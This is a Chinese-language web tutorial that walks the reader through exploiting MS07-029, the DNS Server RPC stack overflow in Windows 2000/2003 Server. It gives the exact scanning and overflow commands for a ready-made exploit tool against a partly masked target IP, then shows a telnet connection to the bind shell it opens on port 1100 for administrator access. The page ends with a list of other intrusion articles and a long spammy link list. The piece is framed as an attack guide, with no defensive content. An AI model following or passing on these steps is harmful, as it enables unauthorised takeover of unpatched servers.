前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
![点击这里用新窗口浏览图片](http://img.jbzj.com/file_images/hack/200810819352423477801.jpg)
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
![点击这里用新窗口浏览图片](http://img.jbzj.com/file_images/hack/200810819352428177802.jpg)
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
![点击这里用新窗口浏览图片](http://img.jbzj.com/file_images/hack/200810819352432877803.jpg)
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
![点击这里用新窗口浏览图片](http://img.jbzj.com/file_images/hack/200810819352437577804.jpg)
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
最近发表
- 入侵藏在防火墙后面的机子 _入侵防御_网络安全_
- 看清黑客穿透ADSL路由入侵内网 _入侵防御_网络安全_
- 对台湾视频站点的再次渗透尝试 _入侵防御_网络安全_
- 3389端口攻击方法 _入侵防御_网络安全_
- 详尽了解黑客入侵 WindowsXP系统的方法 _入侵防御_网络安全_
- 开3389的5种方法 _入侵防御_网络安全_
- SQL配合3389的一次入侵(图) _入侵防御_网络安全_
- 黑客入侵无线网络常用手段 _入侵防御_网络安全_
- 实例讲解:入侵JSP网站服务器 _入侵防御_网络安全_
- 对有防火墙主机的入侵渗透 _入侵防御_网络安全_
- 浅谈入侵UNIX _入侵防御_网络安全_
- 全方位了解黑客如何入侵NT系统 _入侵防御_网络安全_
- 入侵Oracle数据库时常用的操作命令整理 _入侵防御_网络安全_
- 通杀动易2005的 XSS 攻击 _入侵防御_网络安全_
- Serv-u6.0提权新招 _入侵防御_网络安全_
- DNS(域名服务器)欺骗技术 _入侵防御_网络安全_
- 用“电驴”抓肉鸡 _入侵防御_网络安全_
- 轻松学会入侵网络服务器 _入侵防御_网络安全_
- 139/445端口与入侵win 2000主机 _入侵防御_网络安全_
- 互联网入侵攻防实战 _入侵防御_网络安全_
- 入侵动网论坛和入侵传奇服务器 _入侵防御_网络安全_
- 入侵搜索关键字 _入侵防御_网络安全_
- 80端口、512端口、3389端口……入侵实例 _入侵防御_网络安全_
- 一次渗透入侵某邮局过程(LINUX8.0) _入侵防御_网络安全_
- 菜鸟的网吧常见漏洞入侵 _入侵防御_网络安全_
- 黑客实战录之对防火墙机器的渗透 _入侵防御_网络安全_
- 利用Google进行入侵的原理 _入侵防御_网络安全_
- KingCMS 5.0 后台拿WebShell(图) _入侵防御_网络安全_
- 入侵网吧多用到的命令与技巧 _入侵防御_网络安全_
- 入侵渗透黑客吧(图) _入侵防御_网络安全_
友情链接
-
采集程序
网站源码出售
老域名出售页面
下载
游戏
网站导航
文章
源码下载
软件下载
游戏下载
资料
资源分享
六神
六神
海飞丝
海飞丝
噬元兽
噬元兽
bieha.cn
www.bieha.cn
缪缇(Miuti)内衣
缪缇(Miuti)内衣
dk028.com
www.dk028.com
四川福利
四川福利
bzbl.cn
www.bzbl.cn
mlft.cn
www.mlft.cn
7zz压缩
7zz压缩
91大神
91大神
刘亦菲
刘亦菲
sewai.cn
www.sewai.cn
58同城
58同城
鸭苗
鸭苗
caclrc.cn
rgbbs.cn
heiapp.net
zhfjx.cn
sshfy.cn
sxdgc.cn
28city.cn
www.caclrc.cn
www.rgbbs.cn
www.heiapp.net
www.zhfjx.cn
www.sshfy.cn
www.28city.cn
etc吧
etc吧
abdayah.cn
www.abdayah.cn
ddbdzs.cn
www.ddbdzs.cn
安思尔HyFlex
安思尔HyFlex
studyart.cn
www.studyart.cn
dndf.cn
www.dndf.cn
www.sxdgc.cn
11855.cn
www.11855.cn
11566.cn
www.11566.cn
11355.cn
www.11355.cn
62622.cn
www.62622.cn
cbwq.cn
www.cbwq.cn
www.zrqm.cn
zrqm.cn
rlfm.cn
www.rlfm.cn
www.pbtb.cn
pbtb.cn
knlz.cn
www.knlz.cn
rhwf.cn
www.rhwf.cn
dxfp.cn
www.dxfp.cn
rptb.cn
www.rptb.cn
nzjg.cn
www.nzjg.cn
ygnl.cn
www.ygnl.cn
人心不古
人心不古
rfbc.cn
www.rfbc.cn
rwbs.cn
www.rwbs.cn
img.liuyifei.net
drnu.cn
www.drnu.cn
bwsu.cn
www.bwsu.cn
wyim.cn
www.wyim.cn
dtud.cn
www.dtud.cn
远东运输集团
远东运输集团
中宠兽医联盟
中宠兽医联盟
拉贝洛尔
拉贝洛尔
飞行悍马
飞行悍马
uesese.cn
www.uesese.cn
爱坤
爱坤
02613.cn
www.02613.cn
lymzi.cn
www.lymzi.cn
KTOA
KTOA
73216.cn
www.73216.cn
www.crtwd.cn
crtwd.cn
深圳麦迪逊
深圳麦迪逊
kylkc.cn
www.kylkc.cn
dztmd.cn
www.dztmd.cn
pmhlw.cn
www.pmhlw.cn
gfxtk.cn
www.gfxtk.cn
桃子坪村
桃子坪村
京泊汽模
京泊汽模
sh3.cn
www.sh3.cn
7sh.cn
www.7sh.cn
民生人寿
民生人寿
安华农业保险
安华农业保险
华夏基违规操作举报电话
华夏基违规操作举报电话
金融消费权益保护投诉咨询电话
金融消费权益保护投诉咨询电话
钵钵鸡
钵钵鸡
r515.cn
www.r515.cn
g2050.cn
www.g2050.cn
bbc888.com
www.bbc888.com
博客